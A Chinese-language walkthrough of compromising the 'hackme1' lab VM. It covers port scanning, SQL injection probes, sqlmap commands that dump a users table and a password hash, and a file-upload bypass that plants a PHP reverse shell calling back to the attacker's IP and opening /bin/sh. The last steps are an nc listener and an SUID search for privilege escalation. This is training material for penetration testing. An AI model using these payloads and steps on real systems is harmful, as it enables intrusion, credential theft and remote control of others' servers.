一、搭建靶场环境
攻击机kali:
IP地址:192.168.232.129靶机hackme1:
IP地址:192.168.232.140
注意:kali和靶机的IP地址需要在同意局域网中即可(同一个网段,并且要在处于同一个网络模式中)
二、 实战
1.主机发现
arp-scan -l
2.端口扫描
masscan --rate=100000 -p 0-65535 192.168.232.140
3.详细扫描
nmap -T4 -sV -O -p 22,80 192.168.232.140
我们发现有两个端口一个是22,另一个是80.
22段口分析
一般只能暴力破解,暂时还没有合适的字典
80端口分析
访问一下看看
发现可以注册我们注册一个账号进去
单击search可以进行查看到很多的书名
4.sql注入
4.1验证是否含有SQL注入漏洞
输入:
Windows OS' and 1=1#
Windows OS' and 1=2#
啥都没有,说明存在漏洞
4.2 sqlmap注入攻击
利用burpsuite抓一下看看
利用sqlmap搞一下
sqlmap -r hack.txt --batch --dbs
看到这个数据库的信息,这时我们试着对webapphacking爆表。
sqlmap -r hack.txt --batch -D webapphacking --tables
爆列
sqlmap -r hack.txt --batch -D webapphacking -T users --dump
现在我们发现这里有用户superadmin.
2386acb2cf356944177746fc92523983解一下这个md5得到用户superadmin的密码:
5.文件上传漏洞
superadmin用户的信息登入进去
这个是文件上传漏洞。
可以利用kali中自带的webshell,来进行攻击。
打开现在修改参数
将其中的IP修改为自己的kali攻击机的IP
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.232.129'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
现在我们进行文件上传
上传的时候进行改一下后缀
ok没毛病可以的
6.kali开启监听
输入:nc -lvp 1234
6.1 访问下上传的文件
使用python,进入bash
输入:python3 -c 'import pty;pty.spawn("/bin/bash")'
7.权限提升
查询suid权限程序:find / -perm -u=s -type f 2>/dev/null
发现一个目录可以进行提取/home/legacy/touchmenot
发现可以的。
总结
本此靶机主要的工具和靶机都很简单,主要涉及的是SQL注入漏洞和文件上传漏洞。
1、sql注入工具:sqlmap
2、抓包工具:burpsuite
3、webshell后门:kali中的后门
4、suid提取:touchmenot提取